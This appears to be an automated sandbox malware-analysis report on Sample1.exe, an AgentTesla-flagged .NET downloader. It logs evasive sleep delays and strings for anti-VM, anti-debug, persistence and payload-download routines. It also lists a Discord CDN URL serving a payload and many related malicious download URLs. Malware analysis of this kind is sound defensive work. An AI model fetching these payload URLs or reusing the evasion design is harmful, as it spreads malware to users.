Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594250	Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe	Window / User API: threadDelayed 7201			Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Window / User API: threadDelayed 2518			Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe TID: 7476	Thread sleep count: 146 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 600	Thread sleep count: 7201 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 600	Thread sleep count: 2518 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599222s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598127s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -598001s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596888s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596538s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595255s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe TID: 848	Thread sleep time: -594250s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599222	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598127	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598001	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596888	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596435	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595255	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594250	Jump to behavior

Source: SystemSettingsBroker.exe, 00000028.00000002.3798976200.0000026F97C52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB Mouse
Source: Sample1.exe, 00000000.00000002.3798293950.0000000000524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ..SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
Source: SystemSettingsBroker.exe, 00000028.00000002.3799426749.0000026F99D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driverp
Source: Sample1.exe	Binary or memory string: DetectVirtualMachine
Source: SystemSettingsBroker.exe, 00000028.00000002.3799426749.0000026F99D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device.
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: SystemSettingsBroker.exe, 00000028.00000003.3129198940.0000026F99DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0VMware, Inc. VMware20,1
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SystemSettingsBroker.exe, 00000028.00000002.3799126415.0000026F97CC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vicVMware, Inc. VMware20,1ter.X
Source: SystemSettingsBroker.exe, 00000028.00000002.3799126415.0000026F97CC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SWD\COMPUTER\MFG_VMware__Inc.&PROD_VMware20_1
Source: SystemSettingsBroker.exe, 00000028.00000003.3129198940.0000026F99DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Sample1.exe	Binary or memory string: vmware
Source: SystemSettingsBroker.exe, 00000028.00000003.3129198940.0000026F99DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SystemSettingsBroker.exe, 00000028.00000002.3799426749.0000026F99D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.infgencounter.devicedescMicrosoft Hyper-V Generation Counterwgencounter.inf
Source: SystemSettingsBroker.exe, 00000028.00000003.3129198940.0000026F99DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: or.VMware Virtual disk SCSI Disk Device`
Source: Sample1.exe	Binary or memory string: <Module>pctool.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepctoolEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem1.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Devicep
Source: SystemSettingsBroker.exe, 00000028.00000002.3799426749.0000026F99D31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: SystemSettingsBroker.exe, 00000028.00000003.3125469886.0000026F99D66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device

Source: C:\Users\user\Desktop\Sample1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe

Queries volume information: C:\Users\user\Desktop\Sample1.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Sample1.exe	83%	Virustotal		Browse
Sample1.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Sample1.exe	100%	Avira	TR/ATRAPS.Gen
Sample1.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://cdn.discordapp.comxz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com	Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.000000000242E000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000023E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Sample1.exe, 00000000.00000002.3799428208.00000000023E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.comxz	Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.discordapp.com	Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.000000000268B000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002409000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
162.159.129.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591875
Start date and time:	2025-01-15 15:10:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Sample1.exe
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@2/0@3/3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 20.190.160.14
Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.svc.static.microsoft, login.live.com, browser.events.data.msn.cn, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:11:30	API Interceptor	11325943x Sleep call for process: Sample1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.130.233	Cheat.Lab.2.7.2.msi	Get hash	malicious	RedLine, zgRAT	Browse	cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2
	BpOyVCAP8g.msi	Get hash	malicious	LummaC Stealer	Browse	cdn.discordapp.com/attachments/1179749162376499230/1179749438646919228/9
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, AveMaria	Browse	cdn.discordapp.com/attachments/1152164172566630421/1153181081793732809/Hioaeztcmim.exe
	PO Details.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb
	quote.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
	MSQNZmmg2F.exe	Get hash	malicious	Vidar	Browse	cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
	b7cwlpwH6S.exe	Get hash	malicious	Amadey RedLine SmokeLoader	Browse	cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
	order-confirmation.doc__.rtf	Get hash	malicious	AgentTesla	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	AgentTesla	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
162.159.129.233	Cheat_Lab_2.7.2.msi	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	DCRat	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	http://162.159.129.233	Get hash	malicious	Unknown	Browse	162.159.129.233/favicon.ico
	2lfV6QiE6j.exe	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
	SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
	1PhgF7ujwW.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
	vhNyVU8USk.exe	Get hash	malicious	Amadey	Browse	cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	gshv2.exe	Get hash	malicious	Unknown	Browse	162.159.129.233
	PO_11171111221.Vbs.vbs	Get hash	malicious	FormBook	Browse	162.159.129.233
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	sNifdpWiY9.exe	Get hash	malicious	Metasploit, Meterpreter	Browse	162.159.134.233
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.129.233
	file.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	CStealer	Browse	162.159.134.233
	https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&	Get hash	malicious	Unknown	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe	Get hash	malicious	Xmrig	Browse	162.159.135.233
	segura.vbs	Get hash	malicious	Remcos	Browse	162.159.135.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	104.19.229.21
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
